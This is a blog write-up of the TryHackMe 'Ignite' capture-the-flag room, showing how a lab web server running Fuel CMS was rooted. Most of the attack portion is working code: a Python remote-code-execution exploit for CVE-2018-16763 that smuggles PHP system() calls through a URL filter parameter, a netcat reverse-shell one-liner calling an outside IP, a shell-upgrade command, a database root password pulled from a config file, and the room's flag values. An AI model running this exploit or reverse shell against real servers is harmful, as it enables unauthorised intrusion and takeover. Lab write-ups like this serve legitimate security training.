Navigate back to the homepage

Ignite - TryHackMe

Ludovic COULON
May 8th, 2020 · 1 min read

TryHackMe | Ignite

A new start-up has a few issues with their web server.

Root the box! Designed and created by DarkStar7471, built by lollava aka Paradox.

Enjoy the room! For future rooms and write-ups, follow @darkstar7471 on Twitter.

First, port scan :

1nmap -sV --script vuln 10.10.217.248

Open 80 port :

Launch the web application (bottom of the home page)

1That's it!
2To access the FUEL admin, go to : http://10.10.217.248/fuel
3User name: admin
4Password: admin

So we have the admin creds but, i’ll check if there is some exploit for the Fuel CMS (there is one)

1# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
2# Date: 2019-07-19# Exploit Author: 0xd0ff9
3# Vendor Homepage: https://www.getfuelcms.com/
4# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
5# Version: <= 1.4.1
6# Tested on: Ubuntu - Apache2 - php5
7# CVE : CVE-2018-16763
8
9import requests
10import urllib
11
12url = "http://10.10.217.248/" # Target IP
13def find_nth_overlapping(haystack, needle, n):
14    start = haystack.find(needle)
15    while start >= 0 and n > 1:
16        start = haystack.find(needle, start+1)
17        n -= 1
18    return start
19
20while 1:
21    xxxx = input('cmd:')
22    url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.parse.quote(xxxx)+"%27%29%2b%27"
23    r = requests.get(url)
24
25    html = "<!DOCTYPE html>"
26    htmlcharset = r.text.find(html)
27
28    begin = r.text[0:20]
29    dup = find_nth_overlapping(r.text,begin,2)
30
31    print(r.text[0:dup])

There you go !

✅ You can send a reverse shell with the php filter

1cmd: rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.45.74 9999 >/tmp/f

✨Better shell with root access 👀

1python -c  'import pty; pty.spawn("/bin/bash")'

With the python interpreter you can have a better shell now, with the config of the database we have the root password mememe

1su -r root
2password: mememe

#1 User.txt

1#cd /home/www-data && cat user.txt
26470e394cbf6dab6a91682cc8585059b

#2 Root.txt

1#cat root.txt
2b9bbcb33e11b80be759c4e844862482d
1#cat /var/www/html/fuel/application/config/database.php
2$db['default'] = array(
3        'dsn'   => '',
4        'hostname' => 'localhost',
5        **'username' => 'root',
6        'password' => 'mememe',**
7        'database' => 'fuel_schema',
8        'dbdriver' => 'mysqli',
9        'dbprefix' => '',
10        'pconnect' => FALSE,
11        'db_debug' => (ENVIRONMENT !== 'production'),
12        'cache_on' => FALSE,
13        'cachedir' => '',
14        'char_set' => 'utf8',
15        'dbcollat' => 'utf8_general_ci',
16        'swap_pre' => '',
17        'encrypt' => FALSE,
18        'compress' => FALSE,
19        'stricton' => FALSE,
20        'failover' => array(),
21        'save_queries' => TRUE
22);

More articles from Ludovic COULON

Mr Robot CTF

Mr Robot CTF writeup

May 10th, 2020 · 1 min read

Advent of Cyber Challenge - TryHackMe

Advent of Cyber Challenge all the challengs solved write up

May 8th, 2020 · 1 min read
© 2020 Ludovic COULON
Link to $https://github.com/LasCCLink to $https://www.linkedin.com/in/ludovic-coulon-b361ba183/Link to $https://www.youtube.com/channel/UCkDvlI9LUuwZ4GKFUbP_OvgLink to $mailto:coulonludovicc@gmail.com
063664e4.js" async="">" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">Link to $https://github.com/LasCCLink to $https://www.linkedin.com/in/ludovic-coulon-b361ba183/Link to $https://www.youtube.com/channel/UCkDvlI9LUuwZ4GKFUbP_OvgLink to $mailto:coulonludovicc@gmail.com